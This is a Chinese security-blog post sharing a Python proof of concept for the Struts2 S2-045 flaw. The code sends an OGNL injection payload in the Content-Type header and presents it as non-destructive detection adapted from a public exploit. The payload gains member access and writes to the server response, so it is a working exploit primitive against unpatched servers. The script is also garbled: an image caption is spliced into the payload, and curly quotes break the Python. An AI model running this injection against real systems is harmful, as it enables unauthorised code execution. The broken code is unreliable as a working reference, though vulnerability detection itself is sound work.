s2-045 无损检测 PoC 分享

华盟原创文章投稿奖励计划
这次的POC由网上公开的EXP修改而来,主要是由于该EXP具有一定的攻击性,所以我们做了一个无损检测的修改,。
附上无损检测POC:
#! /usr/bin/env python
#coding: utf-8
import requests
import sys
header = dict()
header[‘Content-Type’] = “%{(#nike=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)图片[2]-s2-045 无损检测 PoC 分享-华盟网(#context.setMemberAccess(#dm)))).(#o=@org.apache.struts2.ServletActionContext@getResponse().getWriter()).(#o.println(‘test’ 602 53718)).(#o.close())}”
s = requests.get(sys.argv[1], headers=header)
print s.content
© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容